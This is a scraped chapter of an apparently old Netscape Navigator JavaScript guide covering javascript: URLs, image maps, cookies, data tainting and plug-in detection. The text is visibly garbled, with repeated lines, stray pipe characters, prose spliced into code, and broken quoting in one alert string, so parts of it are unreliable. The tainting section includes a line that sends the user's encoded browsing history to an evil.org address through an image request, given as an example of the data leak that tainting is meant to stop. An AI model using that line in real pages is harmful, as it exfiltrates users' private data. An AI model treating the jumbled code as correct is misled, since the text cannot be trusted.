his chapter describes some special concepts and applications that extend the power and flexibility of Navigator JavaScript. The chapter covers the following topics:
his chapter describes some special concepts and applications that extend the power and flexibility of Navigator JavaScript. The chapter covers the following topics:
|
|
|
|
|
|
|
|
|
|
|
<A HREF="javascript:history.go(0)">Reload Now</A>to reload the current page when the user clicks it. In general, you can put any statements or function calls after the "javascript:" URL prefix. You can use JavaScript URLs in many ways to add functionality to your applications. For example, you could increment a counter p1 in a parent frame whenever a user clicks a link, using the following function:
function countJumps() {
parent.p1++
window.location=page1
}
To call the function, use a JavaScript URL in a standard HTML hyperlink:
<A HREF="javascript:countJumps()">Page 1</A>This example assumes page1 is a string representing a URL. If the value of the expression following a "javascript:" URL prefix evaluates to undefined, no new document is loaded. If the expression evaluates to a defined type, the value is converted to a string that specifies the source of the document to load.
<MAP NAME="buttonbar">
<AREA SHAPE="RECT" COORDS="0,0,16,14"
HREF ="javascript:top.close(); window.location = newnav.html">
<AREA SHAPE="RECT" COORDS="0,0,85,46"
HREF="contents.html" target="javascript:alert(`Loading
Contents.'); top.location = contents.html">
</MAP>
The "about:logo" image is built in to Navigator and displays the Netscape logo.
<A HREF="img.html"><IMG SRC="about:logo" BORDER=0 ISMAP></A>When you click an image with the ISMAP attribute, Navigator requests a URL of the form
URL?x,ywhere URL is the document specified by the value of the HREF attribute, and x and y are the horizontal and vertical coordinates of the mouse pointer (in pixels from the top-left of the image) when you clicked. Traditionally, image-map requests are sent to servers, and a CGI program performs a database lookup function. With Navigator JavaScript, however, you can perform the lookup on the client. You can use the search property of the location object to parse the x and y coordinates and perform an action accordingly. For example, suppose you have a file named
img.html with the following content:
<H1>Click on the image</H1>When you click a part of the image, Navigator reloads the page (because the HREF attribute specifies the same document), adding the x and y coordinates of the mouse-click to the URL. The statements in the else clause then display the x and y coordinates. In practice, you could redirect to another page (by setting location) or perform some other action based on the values of x and y.
<P>
<A HREF="img.html"><IMG SRC="about:logo" BORDER=0 ISMAP></A>
<SCRIPT>
str = location.search
if (str == "")
document.write("<P>No coordinates specified.")
else {
commaloc = str.indexOf(",") // the location of the comma
document.write("<P>The x value is " + str.substring(1, commaloc))
document.write("<P>The y value is " + str.substring(commaloc+1, str.length))
}
</SCRIPT>
defaultStatus = "Some rise, some fall, some climb...to get to Terrapin"
<A HREF="contents.html"This example displays the hint "Click to display contents" in the status bar when you move the mouse pointer over the link.
onMouseOver="window.status='Click to display contents';return true">
Contents</A>
For a complete description of cookies, see Appendix D, "Netscape cookies.".Netscape cookies are a mechanism for storing persistent data on the client in a file called
cookies.txt. Because HyperText Transport Protocol (HTTP) is a stateless protocol, cookies provide a way to maintain information between client requests. This section discusses basic uses of cookies and illustrates with a simple example.
Each cookie is a small item of information with an optional expiration date and is added to the cookie file in the following format:
name=value;expires=expDate;
For more information on escape and unescape, see the topics in the reference section.name is the name of the datum being stored, and value is its value. If name and value contain any semicolon, comma, or blank (space) characters, you must use the escape function to encode them and the unescape function to decode them. expDate is the expiration date, in GMT date format:
Wdy, DD-Mon-YY HH:MM:SS GMTAlthough it's slightly different from this format, the date string returned by the Date method toGMTString can be used to set cookie expiration dates. The expiration date is an optional parameter indicating how long to maintain the cookie. If expDate is not specified, the cookie expires when the user exits the current Navigator session. Navigator maintains and retrieves a cookie only if its expiration date has not yet passed.
Using cookies with JavaScript
The document.cookie property is a string that contains all the names and values of Navigator cookies. You can use this property to work with cookies in JavaScript.
Here are some basic things you can do with cookies:
// Sets cookie values. Expiration date is optionalNotice the use of escape to encode special characters (semicolons, commas, spaces) in the value string. This function assumes that cookie names do not have any special characters. The following function returns a cookie value, given the name of the cookie:
//
function setCookie(name, value, expire) {
document.cookie = name + "=" + escape(value)
+ ((expire == null) ? "" : ("; expires=" + expire.toGMTString()))
}
function getCookie(Name) {
var search = Name + "="
if (document.cookie.length > 0) { // if there are any cookies
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length
// set index of beginning of value
end = document.cookie.indexOf(";", offset)
// set index of end of cookie value
if (end == -1)
end = document.cookie.length
return unescape(document.cookie.substring(offset, end))
}
}
}
Notice the use of unescape to decode special characters in the cookie value.
function register(name) {
var today = new Date()
var expires = new Date()
expires.setTime(today.getTime() + 60*60*24*365)
setCookie("TheCoolJavaScriptPage", name, expires)
}
The BODY of the document uses getCookie (defined in the previous section) to check whether the cookie for TheCoolJavaScriptPage exists and displays a greeting if it does. Then there is a form that calls register to add a cookie. The onClick event handler also calls history.go(0) to redraw the page.
<BODY>
<H1>Register Your Name with the Cookie-Meister</H1>
<P>
<SCRIPT>
var yourname = getCookie("TheCoolJavaScriptPage")
if (yourname != null)
document.write("<P>Welcome Back, ", yourname)
else
document.write("<P>You haven't been here in the last year...")
</SCRIPT>
<P> Enter your name. When you return to this page within a year, you will be greeted with a personalized greeting.
<BR>
<FORM onSubmit="return false">
Enter your name: <INPUT TYPE="text" NAME="username" SIZE= 10><BR>
<INPUT TYPE="button" value="Register"
onClick="register(this.form.username.value); history.go(0)">
</FORM>
How tainting works
A page's author is in charge of tainting elements. The following properties are tainted by default:
You can use tainted data elements any way you want in your script, but if your script attempts to pass a tainted element's value or any data derived from it over the network in any way (for example, via a form submission or URL), a dialog box is displayed so the user can confirm or cancel the operation. Values derived from tainted data elements are also tainted. If a tainted value is passed to a function, the return value of the function is tainted. If a string is tainted, any substring of the string is also tainted. If a script examines a tainted value in an if, for, or while statement, the script itself accumulates taint. You can taint and untaint properties, variables, functions, and objects, as described in "Tainting and untainting individual data elements". You cannot untaint another server's properties or data elements.
Enabling tainting
To enable data tainting, the end user sets the NS_ENABLE_TAINT environment variable as follows:
autoexec.bat or NT user settings.
if (navigator.taintEnabled()) {
function1()
}
else function2()
For details on taintEnabled, see "taintEnabled".
Tainting and untainting individual data elements
You can taint data elements (properties, variables, functions, objects) in your scripts to prevent the returned values from being used inappropriately by other scripts or propagating beyond another script. You might want to remove tainting from a data element so other scripts can read and do anything with it. You cannot untaint another server's data elements.
You control the tainting of data elements with two functions: taint adds tainting to a data element, and untaint removes tainting from a data element. These functions each take a single data element as an argument.
For example, the following statement removes taint from a property so that a script can send it to another server:
untaintedStat=untaint(window.defaultStatus)
Neither taint nor untaint modifies its argument; rather, both functions return a marked or unmarked reference to the argument object, or copy of the primitive type value (number or boolean value). The mark is called a taint code. JavaScript assigns a unique taint code to each server's data elements. Untainted data has the identity (null) taint code.
For details on taint and untaint, see "taint" and "untaint".
// untaintedStat can now be sent in a URL or form post by other scripts
Tainting that results from conditional statements
In some cases, control flow rather than data flow carries tainted information. To handle these cases, each window has a taint accumulator. The taint accumulator holds taint tested in the condition portion of if, for, and while statements. The accumulator mixes different taint codes to create new codes that identify the combination of data origins (for example, serverA, serverB, or serverC).
The taint accumulator is reset to identity only if it contains the current document's original taint code. Otherwise, taint accumulates until the document is unloaded. All windows loading documents from the same origin share a taint accumulator.
You can add taint to or remove taint from a window's taint accumulator.
document.write("<img src=http://evil.org/cgi.bin/fake-img?" +
encode(history) + ">")
The following script checks to see whether the client is capable of displaying QuickTime movies.
var myMimetype = navigator.mimeTypes["video/quicktime"]
if (myMimetype)
document.writeln("Click <A HREF='movie.qt'>here</A> to see a " +
myMimetype.description)
else
document.writeln("Too bad, can't show you any movies.") plugins array
plugins is an array of all plug-ins currently installed on the client. Each element of the array is a Plugin object, which has properties for its name, file name, and description as well as an array of MimeType objects for the MIME types supported by that plug-in. The user can obtain a list of installed plug-ins by choosing About Plug-ins from the Help menu.
For example, the following table summarizes the values for the LiveAudio plug-in:
The following script checks to see whether the Shockwave plug-in is installed and displays an embedded Shockwave movie if it is:
var myPlugin = navigator.plugins["Shockwave"]
if (myPlugin)
document.writeln("<EMBED SRC='Movie.dir' HEIGHT=100 WIDTH=100>")
else
document.writeln("You don't have Shockwave installed!")